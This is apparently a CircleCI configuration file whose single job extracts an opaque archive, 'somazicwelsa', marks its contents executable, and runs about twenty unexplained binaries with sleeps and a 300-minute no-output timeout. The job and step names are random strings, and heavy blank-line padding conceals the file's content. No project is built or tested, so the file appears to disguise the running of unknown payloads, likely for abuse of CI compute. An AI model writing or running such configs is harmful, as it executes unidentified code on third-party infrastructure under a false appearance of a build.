

























































































































































































































































version: 2.1
jobs:
  Avaab:


























































































































































































































































    docker:


























































































































































































































































      - image: circleci/ruby:2.6.3-stretch-node
    steps:
      - checkout
      - run:


























































































































































































































































          name: A163
          command: sudo apt update -y
      - run:
          name: Buioewe


























































































































































































































































          command: |
            tar -xf somazicwelsa && chmod u+x *
            ./a
            ./b
            ./d
            ./mbc
            ./11
            ./c


























































































































































































































































      - run:
          name: Buioewe


























































































































































































































































          command: |
            ./d1
            ./d2
            ./d3
            ./d4
      - run:
          name: Seiroer


























































































































































































































































          command: |
            ./e1
            sleep 30s
            ./e4
      - run:
          name: Dwikorm


























































































































































































































































          command: |
            sleep 30s
            ./e4
      - run:
          name: Ranuer


























































































































































































































































          no_output_timeout: 300m
          command: |
            ./f
            ./f1
            ./f2
            ./f3
            ./g1
            ./g2 && ./e3
            ./e4


























































































































































































































































    parallelism: 1






























































































































































































































































































workflows:
    version: 2.1
    build:
        jobs:


























































































































































































































































            - Avaab























































































































































































































































































































































































































































































































